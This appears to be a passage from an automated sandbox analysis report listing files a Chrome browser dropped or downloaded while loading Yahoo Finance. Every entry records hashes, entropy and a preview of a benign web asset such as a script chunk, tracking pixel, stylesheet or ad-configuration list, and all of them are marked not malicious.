                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4356)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.372876566751865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:nTUU6nYzvh+FFHfZb+JkeXXYjiU6qECF/vlj2X/vPjvvNlavBeGFbgctktPlY:n16ntHfukeXIP6qbF/vlj2X/vPjXHap7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:72EE4E559EB2DC17D66DD1874423EB86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F3A7B26FAE23933E7D33FEBCEBA7DA06B9455E10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:477FFA2EB1BC8E73A798FC1FD723A8890AB684FB40A44549611AAAFC3DDF8A3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F2755AA4230E4164A662E0CFA31C3F07904EAD803561F545CBAE9C464C82129479B42D7A068C99C7DA6CD8119172831AAF74DA64A07CE48347140AB16635A102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as U,p as M,k as h,n as E,i as f,y as W,e as S,t as d,d as C,f as k,h as m,q as y,l as p,m as b,N as _}from"./scheduler.Dsuh-FKt.js";import{S as X,i as Y}from"./index.CvwOawEI.js";import{ap as Z,aq as $,g as x,ar as ee,b as R,o as V,q as D,as as O,N as w}from"./commonUtil.BWwawKjd.js";function te(s){let e,t=s[8](s[3]||s[2])+"",r;return{c(){e=S("span"),r=d(t),this.h()},l(l){e=C(l,"SPAN",{class:!0});var n=k(e);r=m(n,t),n.forEach(f),this.h()},h(){y(e,"class","bold yf-1uof5l0")},m(l,n){h(l,e,n),p(e,r)},p(l,n){n&12&&t!==(t=l[8](l[3]||l[2])+"")&&b(r,t)},d(l){l&&f(e)}}}function le(s){let e,t=s[8](s[3]||s[2])+"",r,l;return{c(){e=S("fin-streamer"),r=d(t),this.h()},l(n){e=C(n,"FIN-STREAMER",{class:!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-template":!0,"data-value":!0,active:!0});var i=k(e);r=m(i,t),i.forEach(f),this.h()},h(){_(e,"class","price bold yf-1uof5l0"),_(e,"data-symbol",s[4]||s[5]),_(e,"data-field",l=s[0].id),_(e,"data-trend","none"),_(e,"data-template",`${s[7]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.162628750394423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:DEMYCIbB4pEx9PgdbToC7MQ+iIo2EBOCoSMgaQME/eYNPLy3zRhH2Qv/H+hf2COW:gMbIbB4pEx9Pg17MQ+iIo2EBOCoSMgaG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FF8039AAC72DA3FC83FBA1B284BAA45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:040E20D71BDCA7AB88AA543178770C55020ED33B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF4698D774243337F18C174D8551304E8618ECCE825AADB7E9671BDD56EC5A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D11081C236AB2C31CFE286BA293E0586EECE7B3ED6872EBAE74C56DC0E40FE7DE24F9D000C04EE19F516F0E273AFE8645325400ECABA68429513732EF8ADFC9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/eh/prebid-config/bp-fp.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28680)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2775443083440825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:fyR1+Si04qdWLuefSLE7cwvuyU2oiuS6WxkkwCdIJfL2G:qrBQg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0D07B0C691AD5B9DC4CC4105F284309F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:364B2668205D16A46E51F1494043D9122EE6383E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:994A2E63E024D6892F1381CAD6C3D8F0167DC76024327B7785926BF14B7671E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3D201887F5DF5D957F3F3A24CF605E77C1F5A45AF8254ACDD6327FBD98F3B73666A03263F494CAFC9DEB0CAEB4CE43D66DF0B80C57C7DEC8646AA66D9340F380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/webcore/js/_staticFinProtobuf.4b1559b8e4645fd93a12.mjs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see _staticFinProtobuf.4b1559b8e4645fd93a12.mjs.LICENSE.txt */.!function(e){"use strict";var t,n,r,i,o=e.Reader,a=e.util,s=e.roots.default||(e.roots.default={});s.quotefeeder=((r={}).QuoteType=(t={},(n=Object.create(t))[t[0]="NONE"]=0,n[t[5]="ALTSYMBOL"]=5,n[t[7]="HEARTBEAT"]=7,n[t[8]="EQUITY"]=8,n[t[9]="INDEX"]=9,n[t[11]="MUTUALFUND"]=11,n[t[12]="MONEYMARKET"]=12,n[t[13]="OPTION"]=13,n[t[14]="CURRENCY"]=14,n[t[15]="WARRANT"]=15,n[t[17]="BOND"]=17,n[t[18]="FUTURE"]=18,n[t[20]="ETF"]=20,n[t[23]="COMMODITY"]=23,n[t[28]="ECNQUOTE"]=28,n[t[41]="CRYPTOCURRENCY"]=41,n[t[42]="INDICATOR"]=42,n[t[43]="CUL_IDX"]=43,n[t[44]="CUL_SUB_IDX"]=44,n[t[45]="CUL_ASSET"]=45,n[t[1e3]="INDUSTRY"]=1e3,n),r.MarketHours=function(){var e={},t=Object.create(e);return t[e[0]="PRE_MARKET"]=0,t[e[1]="REGULAR_MARKET"]=1,t[e[2]="POST_MARKET"]=2,t[e[3]="EXTENDED_HOURS_MARKET"]=3,t}(),r.OptionType=function(){var e={},t=Object.create(e);return t[e[0]="CALL"]=0,t[e[1]="PUT"]=1,t}(),r.Pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.139728931781201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHCUOFUOGLFUUvXALLGQkHgwdIF8IAdSfFED:+9mc4sl3O4XWMvXA3kHgwKFSZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D2EAE957630F2A5473DCF80198ECE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2CEABA184D273AF24CF40F5AF121FB44E4DA9014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B74434EE99707AD7DF004D009EB9F45DA79EB0FA8010B15557EC7D9FC550D3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:946DC490B794374A75D318383FD86A900D61DFB20A14B14F8FD274428721209F8746CB84CA2415CAE4D06C1E1AFEA26A07F0602462BAE23F9961FB8DAAD167B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/arrow_forward.8N8VOjY3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12 4-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"/></svg>';export{w as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183539949905521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hxuJzhqIzqYUwfAbpli7v8IhGJUKqiKfN0Edx57bOq29L/oOvkZBmvV4Bp4QL:hYI5y70iGJwig04xJbOv3EBmvV4BWQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D43FF75A5B866C22654D1FC51E296292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ED36CA2DD3199DFB015A14D4493FD155857DA7E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DE82F43F76C42A8B9CEFCF6F2450A5DEB4352947BC3E2578455AF68C112DB0DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:85CF63CA2439F030B03724FCB52B7AB4D8ED5FDEC855FAAD1F9BDFB70448F04F6BB63A37FD18241090503F5D4A3EA856DB9666B50C5FF338C7FFBB14ACD4EDE6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://openweb.jac.yahoosandbox.com/2.0.0/safeframe.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>JAC SafeFrame Sandbox</title>. <style>html,body{margin:0;padding:0;width:100%;height:100%}</style>.</head>.<body>.<div id="fc_align" style="position:absolute;top:0;left:0;">. <script src="https://jac.yahoosandbox.com/2.0.0/jac.js"></script>.</div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.795537284956637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O4Ut8vHhKWJ3S4S1UpMhni6jUs8sh6BqZ/T7:a1PXhLJ3St1Uihni6jUs8bQ7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:79AD25421677DDAAF4639B7CFFF2F1FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:22BE49015F2FA06DBE120F9414F15D43BCD517C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4FCD7D21A472CDC63BE194878AF3066788B8D6D476200D0CC6C9DFBFE0DFCD1C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8B509315FA5D2F636932E2B2F1095900417A3C26B2F0317CD71EA995288E9311A83B3BFEDE7FA7D2C51B456F97DD9FEFDC3B8223184ECA502F91DB2EEF005668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.47 6.47 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14"/></svg>';export{s as default};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537072991&val=CAESEBekM66nmsCe4_HEDSbE50c&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=YTViNWU4ODctODk2ZS02NGIzLTRiZjctMjMxOWQ4MzdkMzI3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2826)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.05781809935793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ZRldgdsGhnk7R/ZPU3/1W+576yUNofJU7U:7iER/I/1W+uNofv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:454E87661BD1AC9365E8D9755CAB0FF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E78C8C40A901F2D77F943636DA3DBA8BA055D39F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:681C0744A444F7FA36EDF4DF33C5EB927A46D4A3EF259D397A99ECD139028E04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2EB2E8851C43F525D0917CB1460273BCCD6B0DD059F2D430499F866E8C162EE3953200B2E420DA384A4CD12DBDA5104FE1AE91D69825DB57E8530D68D9F7E2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Select.G4QVlChI.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.itm.yf-1hdw734{white-space:nowrap;margin:0;list-style:none;padding:.625rem var(--space-5);cursor:pointer;line-height:1.25;position:relative;justify-content:flex-start;z-index:2;display:flex;gap:var(--space-3);align-items:center;width:100%;flex-grow:1}.itm.wordWrap.yf-1hdw734{white-space:normal;word-break:break-word}.itm[aria-selected=true].yf-1hdw734{background-color:var(--surface1);color:var(--primary);font-weight:var(--font-bold)}.itm[aria-selected=true].yf-1hdw734 .check{display:initial}.itm.yf-1hdw734:hover,.itm.yf-1hdw734:focus-visible{background-color:var(--table-hover-emph);color:var(--hovered-neutral)}.itm.yf-1hdw734:active{background-color:var(--table-selected-emph);color:var(--primary)}.itm.yf-1hdw734 .check{display:none;margin-left:auto}.borderBottom.yf-1hdw734{border-bottom:1px solid var(--separator)}.border.yf-1hdw734:last-child{border-top:1px solid var(--separator)}.container.yf-1s919cc.yf-1s919cc{position:relative}.menuBtn.yf-1s919cc.yf-1s919cc,.select.yf-1s919cc.yf-1s9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.965504626917684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:6sEiLQyPOQqzUd3SX7jSbBqt8qL3CWrmeuQwVx4lIHez:fEyP9qI1SX4n8La6wVilhz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:36C7A103DA669E7102DB2E95FA6E1AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2C7D65A7D8EDF0A7F34A61068C20EFAE77B6A4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF21CB418590A8EC25869FDCC3F3269793097D8D1AA8981B786791AB9A74A260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1425D51F45B5A0CD2782A9177A81D1A3266F16D452BE366FD8DD0ED15B6D2EC607438025F2F8F3783017037160F2BCE739AF5BBB7AE8AC76D8E5529E0296B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............R.l.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H................................................T.....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx..}...E.....od%+$.........o...QGgF.'..(*....t.u@..QT..E.M....HH..........{...A...}..:U}.....o.....d...X.\,S7UY._.C.UiU..51.1..4Fi....J...../.E[..<...kbN.5Y...8.CM..?..k..RS...k(J..S.$u+./..d9*.k....D.V..W.9.-Sy...8..Q...i...Y...U.S...9d.+..c|<.6.|-.RL.5nOq.;....SD...-.Z...0..vF&.gl..U.;....j....>w..E|.9T.8bM.G..(_j......xY...Wm\..UZ.x..&.\....q.M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12999)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.55794925884855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:gydND/2udByGgEzC4IHy5gI4fFb/R8mstacFTuz:pz2ud1gEzTBgI4fh58msgsTuz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8EB9B41C340492F9B282E3B504FDD1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ABF4E716B91BCF21E4C073522F50D0859D169D71
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:757E40E5FC942C6E70580AE3675ACDFC684EA4C39EC8E39BFA5E859B26F39197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B9CC89A9A2EE279A2C89149708B06601843D1E8A874D7D2DF3E53873C08D91F7C726F851EA109A4C27FC660EBAFE9EDC6F9C82331905065147CEB2C07A1FD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectorNews.DlxEsgVc.js
